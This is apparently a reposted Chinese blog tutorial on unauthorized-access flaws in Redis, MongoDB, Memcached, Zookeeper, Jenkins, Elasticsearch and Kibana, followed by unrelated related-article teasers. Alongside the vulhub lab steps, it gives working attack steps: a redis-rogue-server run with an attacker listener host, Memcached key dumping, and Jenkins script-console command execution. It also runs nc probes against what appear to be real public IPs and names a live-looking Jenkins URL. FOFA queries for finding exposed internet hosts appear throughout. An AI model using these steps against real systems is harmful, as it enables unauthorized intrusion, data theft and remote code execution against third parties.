未授权访问漏洞系列

news2024/12/26 22:31:43

环境

1.此漏洞需要靶场vulhub,可自行前往gethub下载

2.需要虚拟机或云服务器等linux系统,并在此系统安装docker和docker-compose提供环境支持

3.运行docker-compose指令为docker-compose up -d即可运行当前目录下的文件

Redis未授权访问漏洞

一、进入vulhub启动docker镜像

cd /vulhub-master/redis/4-unacc

启动docker

二、在系统安装redis,见上图

redis链接6379为redis的默认端口

redis-cli -h 192.168.4.176 -p 6379

即可链接成功

三、可以直接连接执行命令且不需要认证说明存在未授权访问漏洞----->下载以下攻击项目…

 git clone https://github.com/n0b0dyCN/redis-rogue-server.git 

四、使用py脚本攻击redis

python3 redis-rogue-server.py --rhost 192.168.30.138 --lhost 192.168.30.129

博主只有一台云服务器连不上,不想搞两个linux系统了,这个实验先这样吧

MongoDB未授权访问漏洞

拉取镜像:docker pull mongo
启动镜像docker run -d -p 27017:27017  mongo
查看镜像:docker ps -a

漏洞利用

使用Navicat进行连接.

实例 可以在fofo里搜索 port="27017",去找一个连一下试一试,不过别犯法了

Memcached未授权访问漏洞

下载Memcached程序并执行以下命令---->启动Memcached漏洞环境

下载地址:
https://www.runoob.com/memcached/window-install-memcached.html
#执行命令
memcached.exe -d install
memcached.exe -d start

步骤二使用Telnet程序探测目标的11211端口.

#Telnet探测
telnet 192.168.4.199 11211
#操作命令
stats //查看memcache服务状态
stats items //查看所有items
stats cachedump 390//获得缓存key
get:state:264861539228401373:261588//通过key读取相应value获得实际缓存内容,造
成敏感信息泄露

用fofa语法 port="11211"搜索

Zookeeper未授权访问漏洞

port="2181"搜索资产

可以使用以下语句

echo envi | nc 114.242.175.75 2181
echo envi | nc 223.5.253.242 2181

使用Zookeeper可视化管理工具进行连接

#工具下载
https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip

Jenkins未授权访问漏洞

使用以下fofa语法进行产品搜索

port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

在打开的URL中.点击 Manage Jenkins–>Scritp Console 在执行以下命令

#执行命令
println "whoami".execute().text  
#命令执行页面
http://125.63.109.2:8080/manage/script/index.php

靶场复现流程

wget http://archives.jenkins-ci.org/redhat/jenkins-1.620-1.1.noarch.rpm
下载

rpm -ivh jenkins-1.620-1.1.noarch.rpm
安装
service jenkins start
启动
关防火墙
systemctl stop firewalld.service

访问服务地址

http://1.92.134.1:8080/manage
http://1.92.134.1:8080/script

#执行命令
println "whoami".execute().text  

Elasticsearch未授权访问漏洞

搜索语法

"Elasticsearch" && port="9200"

存在未授权访问则直接进入到信息页面…不需要输入用户密码登陆

#访问测试
http://localhost:9200/_plugin/head/web管理界面
http://localhost:9200/cat/indices
http://localhost:9200/river/search 查看数据库敏感信息
http://localhost:9200/nodes查看节点数据

Kibana未授权访问漏洞

搜索语句

"kibana" && port="5601"

无需登录访问即存在未授权访问漏洞

Docker Remote APl未授权访问漏洞

port="8080" && app="Kubernetes"

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1984776.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

流程挖掘,为光伏企业重塑确定的竞争力

2023年12月15日,2023中资光伏出海大会在江苏南京隆重举行。国内领先的流程挖掘服务商望繁信科技应邀出席大会,与来自海内外的重要领导、重磅嘉宾、行业大咖齐聚一堂,聚焦“数字化、全球化、本地化”,共同探讨中资光伏企业的出海机…

windows11 DNS手动配置过DNS,在恢复成自动获取后,无法自动获取到DNS,网卡里面DNS还是显示之前手动配置的DNS

windows11 DNS一开始手动配置过DNS,然后在恢复成自动获取后,网卡无法自动获取到DNS,并且网卡里面DNS显示还是之前手动配置的DNS。 系统版本:windows11 企业版、版:10.0.22621 版本 22621 解决办法: 注册表“HKEY_LO…

RHEL9网络设定及网络脚本

1. 添加一张网卡 2. 重写一个网卡配置文件 [rootlocalhost ~]# cd /etc/NetworkManager/system-connections/ [rootlocalhost system-connections]# ls ens160.nmconnection [rootlocalhost system-connections]# vim ens224.connection [rootlocalhost system-connections…

大模型应用(六)如何写好一个prompt,理论+实践

前言 设定是四个基本要素之一,没有一个好的prompt,就绝对不可能有一个好的agent。 如何写prompt的大部分是我粘的,实在是懒得写了。不感兴趣可以直接跳实战。 什么是prompt 大语言模型(LLM)的能力并不是被设计出来…

【数据结构与算法】迷宫求解------回溯法

回溯法 一.迷宫求解算法二.二维数组表示地图1.地图2.初始化地图3.地图的打印 三.进入迷宫四.栈的实现五.迷宫内探1.首先判断我们的入口2.入栈做标记3.开始探险4.出口判断5.能否下一步6.做标记7.不能下一步 六.运行结果 一.迷宫求解算法 当我们想要找到迷宫的出口,那我们在计算…

为什么网站要使用HTTPS访问

网站使用HTTPS访问的原因有很多,主要可以归纳为以下几个关键点: 1、数据安全性:HTTPS使用SSL/TLS协议对通信过程进行加密,确保信息在传输过程中不被窃取、篡改或冒充。对于涉及敏感信息(如个人身份、信用卡号等&#x…

AnyGPT: Unified Multimodal LLM with Discrete Sequence Modeling

发表时间:arXiv 2024年2月26日 论文链接:https://arxiv.org/pdf/2402.12226 作者单位: Fudan University Motivation: LLM 在理解和生成人类语言方面表现出非凡的能力。但是,LLM 的能力仅限于针对文本的处理。而现实…

JVM系列 | 对象的消亡2——HotSpot的设计细节

HotSpot 的细节实现 文章目录 HotSpot 的细节实现OopMap 与 根节点枚举根节点类型及说明HotSpot中的实现 OopMap 与 安全点安全点介绍如何保证程序在安全点上? 安全区域记忆集与卡表记忆集卡表 写屏障并发的可达性分析(与用户线程)并发可达性…

Spring boot框架指南

1. Spring Boot 概述 1.1 定义与起源 Spring Boot是一种基于Spring框架的开源框架,旨在简化Spring应用程序的创建和开发过程。它通过提供一系列默认配置和自动配置功能,减少了开发者在配置上的工作量,使得快速搭建生产级别的Spring应用程序…

OV SSL证书优势及获取渠道

OV证书,即组织验证型SSL证书,通过严格的组织审查流程,为网站提供数据传输加密、身份验证和信息完整性保护。 OV证书优势 1 高信任度 OV证书通过证书颁发机构(CA)对企业实名认证,包括企业名称、注册地址、…

万能门店小程序开发平台功能源码系统 带完整的安装代码包以及安装搭建教程

互联网技术的迅猛发展和用户对于便捷性需求的不断提高,小程序以其轻量、快捷、无需安装的特点,成为了众多商家和开发者关注的焦点。为满足广大商家对于门店线上化、智能化管理的需求,小编给大家分享一款“万能门店小程序开发平台功能源码系统…

kernel32.dll丢失?那么kernel32.dll如何修复?教你几种修复丢失kernel32.dll错误的方法

在使用电脑时你是否遇到过kernel32.dll丢失的情况,那么遇到这种情况应该如何解决呢?遇到kernel32.dll丢失就会导致电脑无法正常运行,应用程序也会无法正常使用,今天就教大家kernel32.dll丢失的解决办法。 几种解决kernel32.dll丢失…

破解USB设备通讯协议实现自定义软件控制的步骤与方法

在设备和计算机之间通过USB进行通讯的情况下,厂家提供的软件可以控制设备,但没有提供任何其他资料和支持,这种情况下,若希望自行开发软件来实现同样的功能,可以通过以下步骤破解通讯协议并开发自定义程序。 1. 捕获US…

干货!如何选择Ai大模型(LLMs)?

过去一年里,大型语言模型(LLMs)在人工智能界风起云涌,纷纷以突破性的进步拓展生成式人工智能的可能性。新模型层出不穷,令人目不暇接。 这些模型依靠日益增长的参数数量和庞大的数据集进行训练,显著提升了…

CentOS版本的Linux系统误删了自带的python和yum,恢复过程

文章借鉴于:Centos误删自带python2.7恢复方法_centos默认的被卸载了-CSDN博客 在进行别的操作的时候,一不小心将我的系统自带的Python2.7.5和yum删除掉了。 后来我尝试重新安装yum,但是安装yum必须要有python。 我又去重新安装了python&am…

前端面试:项目细节重难点问题分享(16)

💁💁更多详情:爱米的前端小笔记(csdn~xitujuejin~zhiHu~Baidu~小红shu)同步更新,等你来看!都是利用下班时间整理的,整理不易,大家多多👍💛➕&…

数据库|SQLServer数据库:数据的基本查询

哈喽,你好啊,我是雷工! 其实对于数据库的查询以前也应用过,只是使用时一般也是根据要实现的要求从网上搜索,能实现应用要求即可,现在根据视频学习,正好有这么一节,就听一遍&#xff…

ROS 2 话题:使用C++进行发布与订阅

ROS 2 话题:使用C进行发布与订阅 ROS 2提供了一种强大而灵活的通信机制,称为话题(Topics)。话题允许节点之间进行异步消息传递,从而实现松耦合的通信模式。在本文中,我们将介绍如何使用C编程语言在ROS 2中…

常见中间件漏洞大全及其修复方法(未完成)

一.Tomcat tomcat 是一个开源而且免费的 jsp 服务器,默认端口 : 8080 ,属于轻量级应用服务器。它可以实现 JavaWeb程序的装载,是配置 JSP ( Java Server Page )和 JAVA 系统必备的一款环境。 1.1 CVE-2017-12615 Tomc…

Transformers 中的Softmax 和 Layer Norm 如何并行?

1.Softmax 如何并行? Softmax 计算公式: 安全的 Softmax 运算: softmax 有个问题,那就是很容易溢出。比如采用半精度,由于float16的最大值为65504,所以只要x>11,那么softmax就溢出了。即使是…